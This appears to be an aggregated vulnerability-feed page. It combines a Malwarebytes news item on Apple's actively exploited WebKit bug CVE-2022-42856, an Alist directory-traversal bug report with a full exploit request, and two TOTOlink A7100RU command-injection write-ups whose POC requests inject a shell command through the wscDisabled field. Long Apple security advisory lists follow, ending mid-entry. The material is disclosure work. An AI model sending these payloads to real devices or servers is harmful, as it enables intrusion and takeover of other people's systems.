Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  iOS 16.1.2

Tags:  Safari 16.2

Tags:  CVE-2022-42856

Tags:  type confusion

Apple has released new security content for iOS 16.1.2 and Safari 16.2. to fix a zero-day security vulnerability that was actively exploited



(Read more...)




The post Update now! Apple patches active exploit vulnerability for iPhones appeared first on Malwarebytes Labs.

Posted: December 16, 2022 by

Apple has released new security content for iOS 16.1.2 and Safari 16.2. Normally we would say that Apple pushed out updates, but in this mysterious case the advisory is about an iPhone software update Apple released two weeks ago. As it turns out, to fix a zero-day security vulnerability that was actively exploited.

**Mitigation**

The updates should all have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level.

How to update your iPhone or iPad.

How to update macOS on Mac.

If you fear your Mac has been infected, try out Malwarebytes for Mac. Or Malwarebytes for iOS for your Apple devices.

Since the vulnerability we’ll discuss below is already being exploited, it's important that you update your devices as soon as you can.

**CVE-2022-42856**

Apple revealed that it is aware that threat actors are actively exploiting the vulnerability listed as CVE-2022-42856. The bug was found in WebKit which is Apple’s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps. So, it’s no surprise that you will find the same CVE number in the Safari security advisory, along with a list of others.

Apple says the impact of the vulnerability is that processing maliciously crafted web content may lead to arbitrary code execution. The underlying issue was what is called a "type confusion" issue, which was addressed with improved state handling.

Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In some cases, this can lead to code execution.

Another clue was given when Apple revealed that security researchers at Google’s Threat Analysis Group, which investigates nation state-backed spyware, hacking, and cyberattacks, discovered and reported the WebKit bug. That might give you an idea about who was using the exploit in the wild.

**Version confusion**

What remains a mystery is why Apple specifically stated that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

We asked our resident Apple expert Thomas Reed why, then, did iOS 16 users get an update and iOS 15 users didn’t?

He pointed out the fact that Apple recently documented that security fixes may only apply to the latest system, and may not be back-ported to older systems. This has always been the case, but it wasn't documented, leaving users guessing about what was going on.

> “Still, Apple has been known to back-port fixes when they're aware of active attacks on an older system, so I doubt it's just a matter of falling back on a disclaimer. That suggests to me that there's some difficulty involved. I don't know exactly what changed in WebKit between iOS 15 and 16, but there were definitely a lot of Safari-related changes in iOS 16, so it's entirely possible there's some kind of architectural change standing in the way of back-porting.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Update now! Apple patches active exploit vulnerability for iPhones

Alist v3.4.0 is vulnerable to Directory Traversal,

**Please make sure of the following things**

*   I have read the documentation.
*   I'm sure there are no duplicate issues or discussions.
*   I'm sure it's due to alist and not something else(such as Dependencies or Operational).
*   I'm sure I'm using the latest version

**Alist Version / Alist 版本**

v3.4.0（It seems like this problem still exists in version 3.5.1）

**Driver used / 使用的存储驱动**

Local

**Describe the bug / 问题描述**

*   A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path
    
*   I created a user 'test' with file upload permission only and set its base path to '/test'
    

*   My file directory structure is as follows

*   Login as 'test', found out that I am already in '/test'

*   And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

*   Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

**Reproduction / 复现链接**

Package:  
PUT /api/fs/put HTTP/1.1  
Host: 192.168.31.148:52000  
Content-Length: 30530  
Accept: application/json, text/plain, _/_  
As-Task: false  
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg\_-rzQ7hf5tbbsy4RSVc  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
**File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal**  
Content-Type: application/octet-stream  
Origin: http://192.168.31.148:52000  
Referer: http://192.168.31.148:52000/  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Connection: close

�PNG  
�

**Logs / 日志**

CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46634: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-46631: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

Released December 13, 2022

**Accounts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AppleAVD**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen University

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42850: Willy R. Vasquez of The University of Texas at Austin

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted TIFF file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42851: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**iTunes Store**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2022-42844: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Software Update**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to elevate privileges

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2022-42849: Mickey Jin (@patch1t)

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

CVE-2022-46702: About the security content of iOS 16.2 and iPadOS 16.2

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

Released December 13, 2022

**AppleAVD**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to kernel code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

**AVEVideoEncoder**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A logic issue was addressed with improved checks.

CVE-2022-42848: ABC Research s.r.o

**File System**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Graphics Driver**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Parsing a maliciously crafted video file may lead to unexpected system termination

Description: The issue was addressed with improved memory handling.

CVE-2022-42846: Willy R. Vasquez of The University of Texas at Austin

**IOHIDFamily**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**iTunes Store**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An integer overflow was addressed through improved input validation.

CVE-2022-40303: Maddie Stone of Google Project Zero

**libxml2**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero

**ppp**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Safari**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1.

Description: A type confusion issue was addressed with improved state handling.

WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.

Released December 13, 2022

**Accounts**

Available for: macOS Ventura

Impact: A user may be able to view sensitive user information

Description: This issue was addressed with improved data protection.

CVE-2022-42843: Mickey Jin (@patch1t)

**AMD**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-42847: ABC Research s.r.o.

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by enabling hardened runtime.

CVE-2022-42865: Wojciech Reguła (@\_r3ggi) of SecuRing

**Bluetooth**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Boot Camp**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: An access issue was addressed with improved access restrictions.

CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: Multiple issues were addressed by removing the vulnerable code.

CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of Offensive Security

**DriverKit**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46693: Mickey Jin (@patch1t)

**IOHIDFamily**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**IOMobileFrameBuffer**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic (@antoniozekic)

**iTunes Store**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: macOS Ventura

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: macOS Ventura

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: macOS Ventura

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: macOS Ventura

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: macOS Ventura

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Ruby**

Available for: macOS Ventura

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-24836

CVE-2022-29181

**Safari**

Available for: macOS Ventura

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: macOS Ventura

